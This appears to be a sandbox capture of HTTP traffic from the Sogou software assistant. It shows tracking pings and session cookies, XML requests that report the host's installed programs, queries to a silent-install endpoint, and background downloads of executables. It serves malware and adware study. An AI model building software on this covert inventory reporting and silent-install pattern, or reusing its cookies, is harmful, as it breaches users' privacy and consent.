Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8508097-11709527/11709528
<<< skipped >>>
GET /net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/yijianchongzhuang_745x240.png&r= HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: image/png
Content-Length: 36851
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 07:40:45 GMT
Expires: Thu, 19 May 2016 07:40:45 GMT
Cache-Control: max-age=86400
ETag: f579abb9bd3bb8df8050ced8c867fffc
X-YunTu-Cache: HIT
X-Yuntu-Trace: tc_48_75
X-Yuntu-Trace-Proxy: sjs_86_87
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 22286
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:28:09 GMT
Expires: Thu, 19 May 2016 13:28:09 GMT
Cache-Control: max-age=86400
ETag: 23f52995ff0ca2894451bafb3013b425
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_45_69
X-Yuntu-Trace-Proxy: sjs_86_87
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6542522661282298716.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
Content-Length: 18169
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 02:14:29 GMT
Expires: Fri, 20 May 2016 02:14:29 GMT
Cache-Control: max-age=86400
ETag: 623d9db4f277757aee2d421986881593
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_124_20
X-Yuntu-Trace-Proxy: tc_196_98
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
Content-Length: 22286
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:28:09 GMT
Expires: Thu, 19 May 2016 13:28:09 GMT
Cache-Control: max-age=86400
ETag: 23f52995ff0ca2894451bafb3013b425
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_45_69
X-Yuntu-Trace-Proxy: sjs_86_87
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 8510
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:27:38 GMT
Expires: Thu, 19 May 2016 13:27:38 GMT
Cache-Control: max-age=86400
ETag: e47f9757865c3d4ac672023a3c8188b9
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: bjzw_40_33
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-1433550905860313072.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 8018
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:44:43 GMT
Expires: Thu, 19 May 2016 11:44:43 GMT
Cache-Control: max-age=86400
ETag: f8328769e4dabe94382be209dee395af
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_124_19
X-Yuntu-Trace-Proxy: tc_196_98
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/6940656908449948330.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 16909
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 06:34:30 GMT
Expires: Fri, 20 May 2016 06:34:30 GMT
Cache-Control: max-age=86400
ETag: caf6c36a823fa1679370b0391f255549
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_16_98
X-Yuntu-Trace-Proxy: tc_192_123
<<< skipped >>>
GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4669602030091557924.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 11255
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 12:47:31 GMT
Expires: Thu, 19 May 2016 12:47:31 GMT
Cache-Control: max-age=86400
ETag: b7f7b4f14c6204c41bda6ec63389622b
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_29_26
X-Yuntu-Trace-Proxy: sjs_86_87
<<< skipped >>>
GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=1&rand=1463641985 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:00 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8755464-8775091
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-8782145
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
POST / HTTP/1.1
Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 236
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 92
Content-Type: application/octet-stream
Connection: Close
POST /pc_assist/install_check.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 1957
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<?xml version="1.0" encoding="utf-8" ?>
<SoftwareInstallFeaturesRequset>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\Adobe Flash Player ActiveX]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\Microsoft .NET Framework 3.5]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\Microsoft .NET Framework 4 Client Profile]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\SogouSoftware]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\Totalcmd]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\WinPcapInst]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\Wireshark]]>
</Reg>
</Item>
<Item>
<Reg>
<![CDATA[$(RegUninstall)\\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}]]&g
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 341
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftwareInstallFeaturesResponse>
<Item>
<Reg><![CDATA[$(RegUninstall)\\Adobe Flash Player ActiveX]]></Reg>
<PCID><![CDATA[7638937123950702413]]></PCID>
</Item>
<Item>
<Reg><![CDATA[$(RegUninstall)\\SogouSoftware]]></Reg>
<PCID><![CDATA[-4581287645299687438]]></PCID>
</Item>
</SoftwareInstallFeaturesResponse>
POST /pc_assist/local_info.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 294
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<?xml version="1.0" encoding="utf-8" ?>
<SoftwareLocalInfosRequest>
<Item>
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
</Item>
<Item>
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
</Item>
</SoftwareLocalInfosRequest>
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:03 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 2272
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftwareLocalInfosResponse>
<Item DisplayName="Adobe Flash Player for IE">
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
<InstallPath>
<FindByPathDirect>
<![CDATA[C:\Windows\SysWOW64\Macromed\Flash]]>
</FindByPathDirect>
<FindByPathDirect>
<![CDATA[%System%\Macromed\Flash]]>
</FindByPathDirect>
</InstallPath>
<ExeFile>
<FindByPath>
<![CDATA[$(InstallPath)\Flash32_18_0_0_232.ocx]]>
</FindByPath>
</ExeFile>
<Version>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\DisplayVersion]]>
</FindByReg>
</Version>
<Icon>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\DisplayIcon]]>
</FindByReg>
</Icon>
<UninstallString>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\UninstallString]]>
</FindByReg>
</UninstallString>
</Item>
<Item DisplayName="............">
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
<InstallPath>
<FindByLink>
<![CDATA[$(StartMenu)\Programs\............\.............lnk]]>
</FindByLink>
<FindByLink>
<![CDATA[$(Desktop)\.............lnk]]>
</FindByLink>
<FindByReg>
<![CDATA[HKEY_LOCAL_MACHINE\S<<< skipped >>>
POST /pc_assist/local_info.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 294
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<?xml version="1.0" encoding="utf-8" ?>
<SoftwareLocalInfosRequest>
<Item>
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
</Item>
<Item>
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
</Item>
</SoftwareLocalInfosRequest>
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:04 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 2272
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftwareLocalInfosResponse>
<Item DisplayName="Adobe Flash Player for IE">
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
<InstallPath>
<FindByPathDirect>
<![CDATA[C:\Windows\SysWOW64\Macromed\Flash]]>
</FindByPathDirect>
<FindByPathDirect>
<![CDATA[%System%\Macromed\Flash]]>
</FindByPathDirect>
</InstallPath>
<ExeFile>
<FindByPath>
<![CDATA[$(InstallPath)\Flash32_18_0_0_232.ocx]]>
</FindByPath>
</ExeFile>
<Version>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\DisplayVersion]]>
</FindByReg>
</Version>
<Icon>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\DisplayIcon]]>
</FindByReg>
</Icon>
<UninstallString>
<FindByReg>
<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\UninstallString]]>
</FindByReg>
</UninstallString>
</Item>
<Item DisplayName="............">
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
<InstallPath>
<FindByLink>
<![CDATA[$(StartMenu)\Programs\............\.............lnk]]>
</FindByLink>
<FindByLink>
<![CDATA[$(Desktop)\.............lnk]]>
</FindByLink>
<FindByReg>
<![CDATA[HKEY_LOCAL_MACHINE\S<<< skipped >>>
POST /pc_assist/newversion_info.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 429
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<SoftwareNewVersionInfosRequest>
<Item>
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
<LocalVersion>
<![CDATA[11.6.602.168]]>
</LocalVersion>
</Item>
<Item>
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
<LocalVersion>
<![CDATA[3.1.13.79]]>
</LocalVersion>
</Item>
</SoftwareNewVersionInfosRequest>
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 1380
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftwareNewVersionInfos>
<Item>
<soft_id><![CDATA[7638937123950702413]]></soft_id>
<name><![CDATA[Adobe Flash Player for IE]]></name>
<logo_url><![CDATA[hXXp://pc3.gtimg.com/softmgr/logo/48/504_48_1433919181.png]]></logo_url>
<installfile_size><![CDATA[19398656]]></installfile_size>
<download_url1><![CDATA[hXXp://c.softmgr.qq.com/fcgi-bin/partnerdown?soft_id=504&partner=108&dl=http://dl.softmgr.qq.com/original/Video/install_flash_player_21_active_x_ie_21.0.0.213.exe]]></download_url1>
<app_updatetime><![CDATA[2016-04-07]]></app_updatetime>
<details><![CDATA[................................................................................................................................................]]></details>
<version><![CDATA[21.0.0.213]]></version>
<is_stable><![CDATA[1]]></is_stable>
<whatsnew><![CDATA[1......................................................................Flash Player ActiveX...NPAPI...PPAPI............................2...........................................Chrome.................................MAC............................3..........Stage3D......VideoTexture.........MAC...PC...................4.........................]]></whatsnew>
<upgrade_rate><![CDATA[81]]></upgrade_rate>
<sco<<< skipped >>>
POST /pc_assist/silent_install.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 254
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<SoftwareSilentParaRequest>
<Item>
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
</Item>
<Item>
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
</Item>
</SoftwareSilentParaRequest>
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 97
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftwareSilentParaRequest>
</SoftwareSilentParaRequest>
POST /pc_assist/soft_info.php?fields=logo_url HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 254
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
<SoftwareOnlineIconRequest>
<Item>
<PCID>
<![CDATA[7638937123950702413]]>
</PCID>
</Item>
<Item>
<PCID>
<![CDATA[-4581287645299687438]]>
</PCID>
</Item>
</SoftwareOnlineIconRequest>
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 359
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>
<SoftInfoResponse>
<Item>
<soft_id><![CDATA[7638937123950702413]]></soft_id>
<logo_url><![CDATA[hXXp://dl.app.sogou.com/pc_logo/7638937123950702413.png]]></logo_url>
</Item>
<Item>
<soft_id><![CDATA[-4581287645299687438]]></soft_id>
<logo_url><![CDATA[hXXp://dl.app.sogou.com/128128.png]]></logo_url>
</Item>
</SoftInfoResponse>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5912222
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
GET /externalapp/SogouSoftwareExternalApp.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yze.t.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.0 200 OK
Date: Wed, 18 May 2016 11:51:24 GMT
Content-Type: application/octet-stream
ETag: "-394504404"
Accept-Ranges: bytes
Last-Modified: Wed, 18 May 2016 11:42:04 GMT
Content-Length: 5844568
Server: WS CDN Server
Age: 69684
Via: 1.0 db80:8032 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=7220069-7373409
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=3120567-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 8588961
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 3120567-11709527/11709528
<<< skipped >>>
GET /app/a/10190001/CC1430117533187 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img03.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:33 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:33 GMT
Last-Modified: Thu, 19 May 2016 00:14:23 GMT
Content-Type: image/png
Content-Length: 104812
X-Cache-Lookup: Hit From MemCache
ETag: 14bc09e4cd90b4aa7520414ded59b107
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster
<<< skipped >>>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11452511-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: application/octet-stream
Content-Length: 257017
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11452511-11709527/11709528
<<< skipped >>>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=4260115-
